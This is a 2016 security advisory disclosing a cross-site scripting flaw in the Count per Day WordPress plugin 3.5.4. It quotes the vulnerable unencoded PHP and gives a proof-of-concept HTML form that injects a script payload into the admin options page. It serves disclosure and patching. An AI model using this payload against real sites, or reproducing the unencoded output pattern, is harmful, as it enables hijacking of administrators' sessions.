------------------------------------------------------------------------
Cross-Site Scripting in Count per Day WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Count per Day
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0024

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Count per Day [2] WordPress Plugin
version 3.5.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Count per Day version 3.5.5 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Count per Day [2] WordPress Plugin shows reads and visitors per
page, visitors today, yesterday, last week, last months and other
statistics. A Cross-Site Scripting vulnerability was found in the Count
per Day WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file counter-options.php and is caused due to
the lack of output encoding on the limit POST parameter.

<?php // mass bots ?>
<div class="postbox">
<?php
$limit = (isset($o['massbotlimit'])) ? $o['massbotlimit'] : 25;
$limit = (isset($_POST['limit'])) ? $_POST['limit'] : $limit;
$limit_input = '<input type="text" size="3" name="limit"
value="'.$limit.'" style="text-align:center" />';

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=count-per-day%2Fcounter-options.php"
method="POST">
			<input type="hidden" name="limit"
value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>[h3]References[/h3]
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_count_per_day_wordpress_plugin.html
[2] https://wordpress.org/plugins/count-per-day/
[3] https://downloads.wordpress.org/plugin/count-per-day.3.5.5.zip